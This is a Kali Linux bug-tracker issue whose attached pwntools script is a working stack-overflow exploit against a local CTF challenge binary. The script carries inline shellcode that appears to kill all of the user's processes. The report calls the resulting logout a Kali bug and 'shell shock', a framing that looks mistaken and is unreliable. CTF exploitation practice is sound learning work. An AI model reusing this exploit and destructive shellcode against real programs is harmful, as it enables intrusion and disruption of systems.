View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0006310 | Kali Linux | General Bug | public | 2020-04-20 13:41 | 2021-09-14 20:15 |
Reporter | OverRide0x | Assigned To | |||
Priority | normal | Severity | minor | Reproducibility | always |
Status | closed | Resolution | suspended | ||
Product Version | 2020.1 | ||||
Summary | 0006310: can inject shell shock throw vulnerable app to close the session and login again | ||||
Description | while working on vulnerable challenge , and by accident make my kali crash and the exit session and login again | ||||
Steps To Reproduce | you will only need to start the fuzzer.py script with python look into the source and change the app dir for the vuln app called leak after run it my kali output file called core you will see it also in the uploaded files | ||||
Attached Files | fuzz.py (509 bytes)
from pwn import * import time sh = process('/home/abdallah/Desktop/htb/JET/leak') print(sh.recvuntil(b"Oops, I'm leaking! ")) base = sh.recvuntil(b"\n") print(base[:-1]) rip = int(base[:-1],16) payload_len = 72 buf = b"\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05" buf_len = len(buf) padding = b"A"*(payload_len-buf_len) payload = buf + padding + p64(rip) time.sleep(1) sh.send(payload) sh.interactive() sh.close() |